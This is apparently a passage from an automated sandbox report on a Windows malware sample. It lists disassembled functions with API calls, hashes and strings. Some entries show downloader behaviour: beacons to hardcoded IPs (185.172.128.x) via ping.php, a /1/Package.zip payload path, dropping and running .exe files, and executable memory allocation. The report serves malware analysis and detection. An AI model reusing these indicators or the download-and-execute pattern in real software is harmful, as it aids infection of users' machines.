Instruction Fuzzy Hash: A4A13632A041089FDF199F78D8517EE7BA1AB06324F14019EEC15EB391D7398DA2C79A

Uniqueness

Uniqueness Score: -1.00%

Function 004192AD Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
Instruction ID: c4abe014ee414803f6a4a6dca87339887fd42b2314c6943b79fa01ee0dc397dc
Opcode Fuzzy Hash: 7455f818b0db2fde8e31381446929043f5d461325fffdbb46aed0dcd817dfcea
Instruction Fuzzy Hash: 1CC13AB1E04249AFDB11CFA9C850BEE7BB1BF09314F04019AE954A7392C7389DC1CB69

Uniqueness

Uniqueness Score: -1.00%

Function 05CF003C Relevance: 12.8, APIs: 5, Strings: 2, Instructions: 515
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004), ref: 05CF024D

Strings

cess, xrefs: 05CF018D
kernel32.dll, xrefs: 05CF008F, 05CF0095

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID: cess$kernel32.dll
API String ID: 4275171209-1230238691
Opcode ID: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction ID: 7aaab1ded95a448d04a3356cde5312a91b2331c78c5d5b65d20379a7378ade29
Opcode Fuzzy Hash: aaa6c488ea091c11cf1d14b1b8159415dd1a008d9b857f0942c425a8c5fa1e0a
Instruction Fuzzy Hash: 7F525C74A01229DFDBA4CF58C984BACBBB1BF09314F1484D9E54EA7352DB30AA85DF14

Uniqueness

Uniqueness Score: -1.00%

Function 0042615A Relevance: 10.6, APIs: 4, Strings: 2, Instructions: 85
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0042615F
RegCreateKeyExA.KERNEL32(80000001,SOFTWARE\BroomCleaner,00000000,00000000,00000000,000F003F,00000000,?,00000000,Installed,0043BED8,SOFTWARE\BroomCleaner), ref: 00426187
RegSetValueExA.KERNEL32(?,?,00000000,00000001,?,?,0043BED8,0043BED9,Installed,Installed), ref: 0042620A
RegCloseKey.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,185.172.128.90,/cpa/ping.php?substr=%s&s=ab&sub=%s,?), ref: 0042622B

Strings

SOFTWARE\BroomCleaner, xrefs: 00426167, 0042617A
Installed, xrefs: 00426169, 00426197, 004261B6, 004261B7

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: CloseCreateH_prologValue
String ID: Installed$SOFTWARE\BroomCleaner
API String ID: 1996196666-529226407
Opcode ID: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction ID: 7631ba6f6479b49e2955b4a66f7b67ea7b8ea0f8d2650bf46820f955d15f7583
Opcode Fuzzy Hash: 9742427db463fe4f6bb28d71d590d7309dc6e65af80fb6a01f8e3694ad2225c2
Instruction Fuzzy Hash: F3319A71A00129EEDF149FA8DC94AFEBB78EB08348F44016EE80277281C7B11D05CB64

Uniqueness

Uniqueness Score: -1.00%

Function 00404189 Relevance: 10.6, APIs: 7, Instructions: 59
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

__EH_prolog.LIBCMT ref: 0040418E
std::_Lockit::_Lockit.LIBCPMT ref: 0040419D
int.LIBCPMT ref: 004041B4

Part of subcall function 00401318: std::_Lockit::_Lockit.LIBCPMT ref: 00401329
Part of subcall function 00401318: std::_Lockit::~_Lockit.LIBCPMT ref: 00401343

std::locale::_Getfacet.LIBCPMT ref: 004041BD
std::_Facet_Register.LIBCPMT ref: 004041EE
std::_Lockit::~_Lockit.LIBCPMT ref: 00404204
__CxxThrowException@8.LIBVCRUNTIME ref: 0040422A

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_GetfacetH_prologRegisterThrowstd::locale::_
String ID:
API String ID: 1202896665-0
Opcode ID: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
Instruction ID: eeb1616ca6cccce41a0e0e35b82109652f5c3a79b41a9d78a32d17684d72b000
Opcode Fuzzy Hash: 361fc1b71d45246d246e84ef011ee978f208c0c02e1cbc670b2b90af33c601f8
Instruction Fuzzy Hash: AD119072A041289BCB04EBA5DC06AEE7774EF84358F10456FF915B72D1DB389A04C7A9

Uniqueness

Uniqueness Score: -1.00%

Function 00426510 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 40
synchronizationCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

ShellExecuteExA.SHELL32(?,.exe), ref: 00426552
WaitForSingleObject.KERNEL32(?,00008000), ref: 00426566
CloseHandle.KERNEL32(?), ref: 0042656F

Strings

.exe, xrefs: 0042651B

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: CloseExecuteHandleObjectShellSingleWait
String ID: .exe
API String ID: 3837156514-4119554291
Opcode ID: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction ID: 8ce7cd6e21d80bec1428d2ca161df36b0ad46b5534dc267783c352d5b9ba18c9
Opcode Fuzzy Hash: f62208f3743acdc8e07c19b13a12db9e2ae385e15dd7ae34529c06f65476a768
Instruction Fuzzy Hash: 1B015A31E00218ABDF15DFA9E8459DDBBB8FF08340F418126F801A6260EB709A45CB84

Uniqueness

Uniqueness Score: -1.00%

Function 00426242 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 35
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(?,40000000,00000000,00000000,00000004,00000080,00000000,?,.exe,00000000,?,?,0042590D,00000001,?,/ping.php?substr=%s), ref: 0042625D
WriteFile.KERNEL32(00000000,?,?,00000001,00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 00426275
FindCloseChangeNotification.KERNEL32(00000000,?,0042590D,00000001,?,/ping.php?substr=%s,?), ref: 0042627E

Strings

.exe, xrefs: 00426247

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: File$ChangeCloseCreateFindNotificationWrite
String ID: .exe
API String ID: 3805958096-4119554291
Opcode ID: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction ID: 1160b3d028a4f0b3eb39880a7a2cc02b481a356c14d22bba427b687e2e61c155
Opcode Fuzzy Hash: b4d6c5e9e66e8ec20fd844d9cf3cc002c1ddea431dde195961cacbec5cc1c6d8
Instruction Fuzzy Hash: 19E06D72701224BBD7311B9AAC48FABBE6CEF86AA4F040165FB05D2110A6A1DC0197B8

Uniqueness

Uniqueness Score: -1.00%

Function 004163FD Relevance: 4.6, APIs: 3, Instructions: 61
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

FindCloseChangeNotification.KERNEL32(00000000,00000000,?,?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 00416453
GetLastError.KERNEL32(?,0041631B,?,?,?,?,?,?,?,?,?,00427EC5,000000FF), ref: 0041645D
__dosmaperr.LIBCMT ref: 00416488

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ChangeCloseErrorFindLastNotification__dosmaperr
String ID:
API String ID: 490808831-0
Opcode ID: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction ID: 375721714d43bc4782e6a43c23cd9332c59ec42f2299351a345cb8f3503d09eb
Opcode Fuzzy Hash: 1075a27ddf30369b5deee0cb8b3ecbf94400a03b09c6828824c0d216b820aa91
Instruction Fuzzy Hash: EA014E3360412016D6256635E8457FF67599B82738F2B017FFD188B2D2EB6CDCC2819D

Uniqueness

Uniqueness Score: -1.00%

Function 00419767 Relevance: 4.6, APIs: 3, Instructions: 50
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SetFilePointerEx.KERNEL32(00000000,?,00000002,?,00000000,?,?,?,?,?,00419816,?,?,00000002,00000000), ref: 004197A0
GetLastError.KERNEL32(?,00419816,?,?,00000002,00000000,?,00416146,?,00000000,00000000,00000002,?,?,?,?), ref: 004197AA
__dosmaperr.LIBCMT ref: 004197B1

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
Instruction ID: ffc3df5eb890e326191760c687c06a6ec256fa7eb9c4ce0b7ceac38b7dc3edc6
Opcode Fuzzy Hash: 463c5a4e2e0130166045ce025073959b6dc275ceb70bdf3037ed559d4bcdb5d5
Instruction Fuzzy Hash: 70012D36620119ABCB159F59DC059EE7B29DF85330B28024AFC219B2D0E6749C918798

Uniqueness

Uniqueness Score: -1.00%

Function 004264F9 Relevance: 4.5, APIs: 3, Instructions: 7
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

SysFreeString.OLEAUT32(?), ref: 00426502
SysFreeString.OLEAUT32(?), ref: 00426507
CoUninitialize.OLE32 ref: 00426509

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: FreeString$Uninitialize
String ID:
API String ID: 1985688103-0
Opcode ID: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction ID: 20283bebf02f6add892787a5acbccff6c180d450b55e9b59979360a618d6bcd4
Opcode Fuzzy Hash: 08deaeae2dcb7a0c46a1906be4fa29c42c893604feb1bbad5e888a8e6db489b5
Instruction Fuzzy Hash: A6B09230D02029ABEF22AB62EE0D45C7F32FF40350F410061F405332308B351D22EE88

Uniqueness

Uniqueness Score: -1.00%

Function 00419CC3 Relevance: 3.7, APIs: 1, Strings: 1, Instructions: 227
fileCOMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Strings

@, xrefs: 00419D84

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: CreateFile
String ID: @
API String ID: 823142352-2766056989
Opcode ID: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
Instruction ID: 6e2d9e324c610adb1979779f65b1bd98f37231a06814a81205b09b8777469d26
Opcode Fuzzy Hash: 30582e01feb3ea99a973a783d27ef441fc8a1aac78a09caaa55a892fc09236fc
Instruction Fuzzy Hash: 4D61E671900209AAEF259E28ECA1BFF3659DB01324F280667F914D63E1D37DCDD1C299

Uniqueness

Uniqueness Score: -1.00%

Function 00401BB2 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 65COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 0040307C: __EH_prolog.LIBCMT ref: 00403081

Part of subcall function 00402FE5: __EH_prolog.LIBCMT ref: 00402FEA
Part of subcall function 00402FE5: std::locale::_Init.LIBCPMT ref: 0040300E

Part of subcall function 00402F6B: __EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Strings

v*@, xrefs: 00401BD0

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prolog$Exception@8InitThrowstd::locale::_std::system_error::system_error
String ID: v*@
API String ID: 3966877926-3062513736
Opcode ID: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction ID: cee5f8951f4aa60660b8f0772aceb561b5f660f34992c4678438f01180239965
Opcode Fuzzy Hash: 497657be53033261b67b0434a3cc26887958964f1d250a566e7946ea216817f5
Instruction Fuzzy Hash: FC218EB1611106AFD708DF59C849A6AB7F9FF48348F14822EE116A7341C7B8DD008BA4

Uniqueness

Uniqueness Score: -1.00%

Function 0042604A Relevance: 3.1, APIs: 2, Instructions: 77COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 0042604F

Part of subcall function 00401BB2: __EH_prolog.LIBCMT ref: 00401BB7

Part of subcall function 00402403: __EH_prolog.LIBCMT ref: 00402408

std::ios_base::_Ios_base_dtor.LIBCPMT ref: 00426131

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prolog$Ios_base_dtorstd::ios_base::_
String ID:
API String ID: 420165198-0
Opcode ID: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction ID: 115bff912634c1bae9a386948b342ebf01da51d0a41a8c3d45e1fed53d0017c0
Opcode Fuzzy Hash: 2ccafb23c208dd6e33c94c9fad69460fbbd1af4e4676f70a9cd624bb09d9f0ce
Instruction Fuzzy Hash: 3531F770D01119EBDB14EF95E985AEDFBB4FF48304F1081AEE405B3681DB786A04CB64

Uniqueness

Uniqueness Score: -1.00%

Function 05CF0E0F Relevance: 3.0, APIs: 2, Instructions: 15COMMON

Download Yara Rule

APIs

SetErrorMode.KERNEL32(00000400,?,?,05CF0223,?,?), ref: 05CF0E19
SetErrorMode.KERNEL32(00000000,?,?,05CF0223,?,?), ref: 05CF0E1E

Memory Dump Source

Source File: 00000000.00000002.2972687467.0000000005CF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 05CF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_5cf0000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: ErrorMode
String ID:
API String ID: 2340568224-0
Opcode ID: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction ID: e05ddbe7559ed95876db12b689fb1193a863fb727343464faa4df4ae26ed8ca5
Opcode Fuzzy Hash: 027e3930a8fc815aeaa48c4a19c17906f2e2d358c6b73c72f02d274321b10a64
Instruction Fuzzy Hash: 4BD01231545128B7D7402A94DC0DBCD7B1CDF05B62F008411FB0EE9081C770964047E5

Uniqueness

Uniqueness Score: -1.00%

Function 0041878B Relevance: 1.7, APIs: 1, Instructions: 151COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
Instruction ID: 7f647bd7b68c58480356602612fa02c60fce203f31c4afd0b56fb408a9d690c1
Opcode Fuzzy Hash: fa999323bafbc2594b0c48ced461f1796886116cb5ad27cd811abb6661ac4478
Instruction Fuzzy Hash: 2851F771A00108AFDB10DF69C840BFA7BA5EF85364F59815EE8489B392CB39DD82C795

Uniqueness

Uniqueness Score: -1.00%

Function 00401F2B Relevance: 1.6, APIs: 1, Instructions: 95COMMON

Download Yara Rule

APIs

__fread_nolock.LIBCMT ref: 00402008

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: __fread_nolock
String ID:
API String ID: 2638373210-0
Opcode ID: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction ID: 92d79e160b507baa56e58511ea190f57013b3733b8d645c4d1d18e9f5b661b4d
Opcode Fuzzy Hash: dd9259938b701549e3a1f201eff00eebe2623ef1ec68c3af772c7781cc5ab522
Instruction Fuzzy Hash: EA317C31604706AFD710DE29C884A5ABBA0BF88354F04863FFD54A73A1D779D854CB9A

Uniqueness

Uniqueness Score: -1.00%

Function 004024A1 Relevance: 1.6, APIs: 1, Instructions: 85COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 004024A6

Part of subcall function 0040187F: __CxxThrowException@8.LIBVCRUNTIME ref: 004018C9
Part of subcall function 0040187F: std::system_error::system_error.LIBCPMT ref: 004018D8

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: Exception@8H_prologThrowstd::system_error::system_error
String ID:
API String ID: 938716162-0
Opcode ID: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction ID: 74f8325a11d62ea13fad7549c786a5ed5267532987f834d27d08a699b4d18117
Opcode Fuzzy Hash: 0aad76d9ccdb38fc9716b0bd4f4ae1cc67668907333425d6879ac6c1d34db6e1
Instruction Fuzzy Hash: C3318B71A00505AFCB18DF29C9D5EAAB7F5FF84318718C16EE416AB791C634EC00CB54

Uniqueness

Uniqueness Score: -1.00%

Function 0040257C Relevance: 1.6, APIs: 1, Instructions: 79COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402581

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction ID: 2a6667c304d01eacddf9d20035e77db0555498f4c479ac31cd54c3f05400b439
Opcode Fuzzy Hash: cdffe7d94a9ad02bd4029dc2a0349a1809f7134020811f9c5978122157e34323
Instruction Fuzzy Hash: D9319870A00615AFCB15DF09CA84A9EBBB1FF48314F14856EE415AB791C7B9ED40CB94

Uniqueness

Uniqueness Score: -1.00%

Function 00402403 Relevance: 1.6, APIs: 1, Instructions: 58COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402408

Part of subcall function 00402B06: __EH_prolog.LIBCMT ref: 00402B0B

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prolog
String ID:
API String ID: 3519838083-0
Opcode ID: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction ID: acc1f40cfc044376a2f11a90f6c11c43800a5431404741bf8f8bd34e997dcd85
Opcode Fuzzy Hash: 7ccbf68215674326e846e9e31825d79c5c502473ac86993a1b2e229bddcf8f14
Instruction Fuzzy Hash: 0F218E70601611DFC728DF15C54896ABBF5FF88314B10C26DE85A9B7A1C770EE41CB90

Uniqueness

Uniqueness Score: -1.00%

Function 0041AED0 Relevance: 1.6, APIs: 1, Instructions: 54COMMON

Download Yara Rule

APIs

__wsopen_s.LIBCMT ref: 0041AF0E

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: __wsopen_s
String ID:
API String ID: 3347428461-0
Opcode ID: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction ID: 1154e27c015a897812a0a5709c6716ad0e12ceb5b9437c51957f638709d22443
Opcode Fuzzy Hash: 77aa99f2f88df8cd4d36c2d0dc9640374021eb40fe0889f8d183050a52ea336c
Instruction Fuzzy Hash: 68114C71904209AFCF05DF58E9419DB7BF4EF48314F10409AF808AB311D631D9618BAA

Uniqueness

Uniqueness Score: -1.00%

Function 0040E1B2 Relevance: 1.5, APIs: 1, Instructions: 46COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
Instruction ID: bb13e13d757cd37dfe0a4f239b5d8845d05e4a8eb61872b1cde1787caac163ea
Opcode Fuzzy Hash: 13643555ea150916878c583df0512c733e0c47517646bb032251a44ff8f984d0
Instruction Fuzzy Hash: E4F0F93254061496D6213A6B9C0579B32AC9F92339F114BBFFC30A61C2CA7CE95246AE

Uniqueness

Uniqueness Score: -1.00%

Function 00402F6B Relevance: 1.5, APIs: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__EH_prolog.LIBCMT ref: 00402F70

Part of subcall function 004035F5: __EH_prolog.LIBCMT ref: 004035FA
Part of subcall function 004035F5: std::_Lockit::_Lockit.LIBCPMT ref: 00403609
Part of subcall function 004035F5: int.LIBCPMT ref: 00403620
Part of subcall function 004035F5: std::locale::_Getfacet.LIBCPMT ref: 00403629
Part of subcall function 004035F5: std::_Lockit::~_Lockit.LIBCPMT ref: 00403670

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: H_prologLockitstd::_$GetfacetLockit::_Lockit::~_std::locale::_
String ID:
API String ID: 3585332825-0
Opcode ID: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction ID: 08e3709e77e7d1eb8e6a734fcd7c8cb2ed90b0a3f4c6ef6dd5fb35cf0d7a5197
Opcode Fuzzy Hash: 6af91489f422ab2b9346da6299f13020bb6ba693aa2f45747282a65afbb3964b
Instruction Fuzzy Hash: 80018F70A10114AFDB14EB25DA4ABAE77F9AF04708F00403EF405B76D1DBF8AE008B58

Uniqueness

Uniqueness Score: -1.00%

Function 0041A1D1 Relevance: 1.5, APIs: 1, Instructions: 36COMMONLIBRARYCODE

Download Yara Rule

APIs

_free.LIBCMT ref: 0041A212

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: _free
String ID:
API String ID: 269201875-0
Opcode ID: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction ID: 12cd10f48dc7b96564373969defca7bad1702ec24c59837b56aad39c86ff4cfc
Opcode Fuzzy Hash: 68fd172b046a401a07b87b6cc8e6e0eb4e84c281b2bbab5ff70b0aff8b290acd
Instruction Fuzzy Hash: AFF09A32511119BBCF005E96DC02CDA3B6EEF89334F100156F91492150DA3ADD60A7A5

Uniqueness

Uniqueness Score: -1.00%

Function 00417A45 Relevance: 1.5, APIs: 1, Instructions: 32memoryCOMMONLIBRARYCODE

Download Yara Rule

APIs

RtlAllocateHeap.NTDLL(00000000,?,00000000,?,0041B3A4,00000000,?,00410DD1,?,00000008,?,0041197C,?,?,?), ref: 00417A77

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: AllocateHeap
String ID:
API String ID: 1279760036-0
Opcode ID: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
Instruction ID: 1d8c2cfb616aaf75abf93827710d27348e1db2613881ba842acdabaabffa5ab7
Opcode Fuzzy Hash: 7e3c3b2e03c3d6e18dbbb536e19013ee5f5a2c75f1da2fa632e63c4bac1336c5
Instruction Fuzzy Hash: 4BE0A03168822557A72026629C04BDF6669AF417E0F150223AC04962A0CB6C8FD181ED

Uniqueness

Uniqueness Score: -1.00%

Function 00419F10 Relevance: 1.5, APIs: 1, Instructions: 15fileCOMMONLIBRARYCODE

Download Yara Rule

APIs

CreateFileW.KERNEL32(?,?,?,?,?,?,00000000), ref: 00419F2D

Memory Dump Source

Source File: 00000000.00000002.2968466836.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_400000_TNQTc6Qmkg.jbxd

Similarity

API ID: CreateFile
String ID:
API String ID: 823142352-0
Opcode ID: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction ID: 9d2ef54cfd7c3626aa2ff180f2ecc7fa707dd95b0fec4855ab8d986de787a24b
Opcode Fuzzy Hash: ec085ca9659a0f56eb08fe4c6845a4ad54c8fcd842bd73b4fead1427a61b2733
Instruction Fuzzy Hash: E9D06C3210010DBBDF128F85DC06EDA3BAAFB4C714F014010FA1856020C732E832EB94

Uniqueness

Uniqueness Score: -1.00%

Function 04265895 Relevance: 1.3, APIs: 1, Instructions: 48memoryCOMMON

Download Yara Rule

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000040), ref: 042658E6

Memory Dump Source

Source File: 00000000.00000002.2972573005.0000000004265000.00000040.00000020.00020000.00000000.sdmp, Offset: 04265000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4265000_TNQTc6Qmkg.jbxd

Yara matches

Similarity

API ID: AllocVirtual
String ID:
API String ID: 4275171209-0
Opcode ID: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction ID: 9e88890e2173048002f0e28c3b68b907d1edb57f534549ca23f4e6223087bf9c
Opcode Fuzzy Hash: 499270a49480bde3a93b1541ef130abcc6c407f96609cce36d97d57e1d2ec7bb
Instruction Fuzzy Hash: FF112B79A10208FFDB01DF98C985E98BBF5AF08351F058094F9489B362D371EA90DF80

Uniqueness

Uniqueness Score: -1.00%

Non-executed Functions

Function 05D14C75 Relevance: 48.5, APIs: 2, Strings: 25, Instructions: 1237COMMON

Download Yara Rule

APIs

Part of subcall function 05D16823: __EH_prolog.LIBCMT ref: 05D16828

GetModuleFileNameA.KERNEL32(00000000,?,00000104,0043BEDC), ref: 05D14D3B

Part of subcall function 05D162B1: __EH_prolog.LIBCMT ref: 05D162B6
Part of subcall function 05D162B1: std::ios_base::_Ios_base_dtor.LIBCPMT ref: 05D16398

Strings

185.172.128.59, xrefs: 05D157A3, 05D1583D, 05D15AB4
\run.exe, xrefs: 05D15E37, 05D15E8F
P, xrefs: 05D15312
P, xrefs: 05D1614A
.exe, xrefs: 05D15B18, 05D15B3A
185.172.128.203, xrefs: 05D1585E, 05D15904, 05D15AA6
/1/Package.zip, xrefs: 05D15C7B, 05D15D15, 05D15D6F
